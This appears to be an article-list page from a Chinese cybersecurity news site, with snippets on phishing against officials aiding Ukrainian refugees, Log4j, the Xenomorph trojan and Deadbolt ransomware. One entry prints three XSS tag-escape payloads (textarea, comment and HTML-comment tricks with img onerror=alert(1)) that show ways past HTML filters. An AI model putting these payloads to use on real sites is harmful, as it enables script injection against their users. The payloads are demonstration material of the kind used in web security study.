文章列表
参与乌克兰难民援助工作的欧洲政府官员成为网络钓鱼活动的目标
据该公司的研究人员称,攻击者正在使用可能被盗的乌克兰武装部队成员的电子邮件账户,针对管理逃离该国的难民的后勤工作的官员。这些电子邮件带有一个恶意的宏附件,试图将危险的恶意软件(研究人员称之为SunSeed)下载到目标计算机上。 该活动是在俄罗斯军队向乌克兰首都推进,促使数十万人逃
未能修补Log4j或将被采取法律行动
Log4j 漏洞降低了安全专业人员对开源工具的信任调查显示:Log4j 最常见的影响是 IT 和安全团队需要在假期工作以评估风险并进行关键更改以保护基础设施和数据 (52%),然后重新评估软件供应链安全实践 (45% ) 和软件购买决策 (44%)。很大一部分受访者也开始重新评估现有的供应商关系 (35%),或者表示该漏
乌克兰网络警察部队参战:已对多家俄罗斯主要网站发起攻击
正如该部队在公告中所详述的,该部队的专家与志愿者联手攻击俄罗斯和白俄罗斯的网络资源。这三个国家目前正在进行大规模的武装力量冲突,其中包括网络前线,这甚至在入侵之前就表现出来了。周六,乌克兰官员决定组建一支特殊的“IT 军队”(IT Army),由来自全球的网络特工和志愿黑客组成。志愿者们利
高危木马Xenomorph曝光:专门窃取用户银行凭证
正如 ThreatFabric 所指出的,黑客们总是在寻找新的方法,通过 Google Play 商店分发恶意软件。Google 正在反击,但黑客似乎总是领先一步。最近的一个邪恶的例子是 “Fast Cleaner” 应用程序。它声称能够通过清除杂乱无章的东西来加快 Android 手机的速度。但实际上,Fast Cleaner 是 Xenomorph 银行
【僵尸申请复活】【未通过】几个标签逃逸-xss
textarea+img标签```<textarea><img src="</textarea><img src='>script' onerror=alert(1)>//">```img标签逃逸```<!--<img src="--><img src=x onerror=alert(1)//">```comment标签逃逸(IE6-8)```<comment><img src="</comment><img src=x onerror=alert(1)//">```
警告:针对 ASUSTOR NAS 设备的 Deadbolt 勒索软件
ASUSTOR 网络附属存储(NAS)设备已经成为 Deadbolt 勒索软件的最新受害者,不到一个月前,类似的攻击受害者是QNAP 网络附加存储设备。为了应对感染,该公司发布了固件更新(ADM 4.0.4.RQO2)来“解决相关的安全问题”该公司还敦促用户采取以下行动,以保持数据安全:更改密码使用强密码更改默认 HTTP 和
State Bar of California Addresses Breach of Confidential Data
The State Bar announced today that it is taking urgent action to address a breach of confidential attorney discipline case data that it discovered on February 24. A public website that aggregates nationwide court case records was able to access and display limited case profile da
俄乌冲突期间“匿名者”黑客组织的行动速度比政府还要快
比如美国众议员 Marco Rubio,就在 Twitter 上对俄方高层的 “心理健康状况” 表示质疑。但是对于多次涉足政治的 “匿名者” 黑客组织,其本身还是存在着不少争议。
数据中毒:下一个大威胁
针对使用人工智能 (AI) 和机器学习 (ML) 的安全软件的数据中毒可能是下一个重大的网络安全风险。根据SANS 技术研究所研究主任 Johannes Ullrich在RSA 2021 的主题演讲中,这是一个大家都应该关注的威胁。Ullrich 在 RSA 说“在机器学习方面,最基本的威胁之一是攻击者实际上能够影响我们用来训练模型的
俄乌冲突加剧,网络安全股价大涨,最高涨幅超110%
财富管理公司 Wedbush Securities 的分析师认为,对网络攻击的担忧可能将整个网络安全行业股价拉高 200 至 300 个基点。2 月 24 日,俄罗斯对乌克兰发起武装行动导致全球主要股指下跌,但网络安全股却成为罕见的逆势增长点。本轮冲突引发了各方对网络攻击的担忧,特别是针对关键基础设施企业的攻击。自
